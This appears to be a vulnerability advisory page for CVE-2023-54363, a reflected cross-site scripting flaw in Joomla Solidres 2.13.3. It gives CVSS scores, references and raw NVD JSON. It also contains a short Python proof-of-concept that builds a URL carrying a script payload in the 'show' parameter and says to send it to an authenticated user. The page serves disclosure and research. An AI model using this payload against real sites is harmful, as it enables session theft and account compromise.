CVE-2023-54363

Description

Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating multiple GET parameters including show, reviews, type_id, distance, facilities, categories, prices, location, and Itemid. Attackers can craft malicious URLs containing JavaScript payloads in these parameters to steal session tokens, login credentials, or manipulate site content when victims visit the crafted links.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Joomla Solidres 2.13.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Code for CVE-2023-54363
# Demonstrates Reflected XSS in Joomla Solidres

import urllib.parse

def generate_exploit_url(base_url):
    # The vulnerable parameters identified in the advisory
    vulnerable_params = ['show', 'reviews', 'type_id', 'distance', 'facilities', 'categories', 'prices', 'location', 'Itemid']
    
    # Simple JavaScript payload to demonstrate vulnerability
    payload = '<script>alert("CVE-2023-54363 XSS")</script>'
    
    # Using 'show' parameter as an example
    params = {
        'option': 'com_solidres',
        'view': 'base',
        'show': payload
    }
    
    # Construct full URL
    query_string = urllib.parse.urlencode(params)
    exploit_url = f"{base_url}?{query_string}"
    
    return exploit_url

if __name__ == "__main__":
    target = "http://example.com/index.php"
    print(f"[+] Exploit URL: {generate_exploit_url(target)}")
    print("[+] Send this URL to an authenticated user to trigger the XSS.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-54363
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-54363
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-54363/
[4] VulDB https://vuldb.com/cve/CVE-2023-54363
[5] http://solidres.com/
[6] https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
[7] https://www.exploit-db.com/exploits/51638
[8] https://www.vulncheck.com/advisories/joomla-solidres-reflected-xss-via-multiple-parameters

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-54363", "sourceIdentifier": "[email protected]", "published": "2026-04-09T21:16:05.907", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating multiple GET parameters including show, reviews, type_id, distance, facilities, categories, prices, location, and Itemid. Attackers can craft malicious URLs containing JavaScript payloads in these parameters to steal session tokens, login credentials, or manipulate site content when victims visit the crafted links."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://solidres.com/", "source": "[email protected]"}, {"url": "https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51638", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/joomla-solidres-reflected-xss-via-multiple-parameters", "source": "[email protected]"}]}}